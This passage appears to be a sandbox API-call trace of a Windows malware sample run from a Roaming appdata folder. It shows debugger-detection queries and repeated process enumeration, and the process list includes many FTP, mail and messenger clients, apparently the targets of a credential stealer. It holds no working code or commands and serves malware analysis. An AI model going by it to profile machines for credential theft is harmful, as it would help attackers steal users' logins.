pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0100.433] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0100.433] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.434] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0100.434] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.435] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xebc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xeb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0100.436] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xeb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0100.436] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f654 | out: lppe=0x18f654*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xeb0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 0 [0100.437] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f644, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe")) returned 0x39 [0100.437] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18f87c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f87c, ReturnLength=0x0) returned 0x0 [0100.437] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f878, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f878, ReturnLength=0x0) returned 0xc0000353 [0100.437] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 3772 18150712" [0100.437] CallWindowProcW (lpPrevWndFunc=0x280004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x68be30 [0100.439] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe\" 2 3772 18150712", pNumArgs=0x18f87c | out: pNumArgs=0x18f87c) returned 0x68be30*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe" [0100.439] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0100.444] Process32FirstW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.444] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0100.445] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0100.445] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.446] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0100.446] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0100.446] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0100.447] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0100.447] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0100.448] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0100.448] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.449] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.449] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.450] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.450] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.451] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0100.451] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.452] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.453] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0100.453] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0100.454] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0100.454] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0100.455] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0100.455] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0100.456] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x580, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x364, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0100.456] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0100.456] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="chelsea.exe")) returned 1 [0100.457] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="temperature_lowest.exe")) returned 1 [0100.457] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="holmes rejected dividend.exe")) returned 1 [0100.458] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="enters.exe")) returned 1 [0100.486] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="championshipsmpegs.exe")) returned 1 [0100.487] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alfred_both.exe")) returned 1 [0100.487] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="facilitatebranchesanymore.exe")) returned 1 [0100.488] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="releases.exe")) returned 1 [0100.488] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="mediterranean.exe")) returned 1 [0100.488] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="junk_ti.exe")) returned 1 [0100.489] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gps_conduct_strips.exe")) returned 1 [0100.490] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="appealfaqcove.exe")) returned 1 [0100.491] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="generated.exe")) returned 1 [0100.491] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="nbaemotions.exe")) returned 1 [0100.491] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="cowdirector.exe")) returned 1 [0100.492] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pill sri.exe")) returned 1 [0100.492] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightweight-yr.exe")) returned 1 [0100.493] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="somerset_concluded_twice.exe")) returned 1 [0100.493] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0100.494] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0100.494] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0100.495] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0100.495] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0100.496] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0100.496] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0100.497] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0100.497] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0100.498] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0100.498] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0100.499] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0100.499] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0100.499] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0100.500] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0100.501] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0100.501] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0100.502] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0100.503] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0100.504] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0100.505] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0100.505] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0100.506] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0100.507] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0100.508] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0100.508] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0100.509] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0100.510] Process32NextW (in: hSnapshot=0xe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, 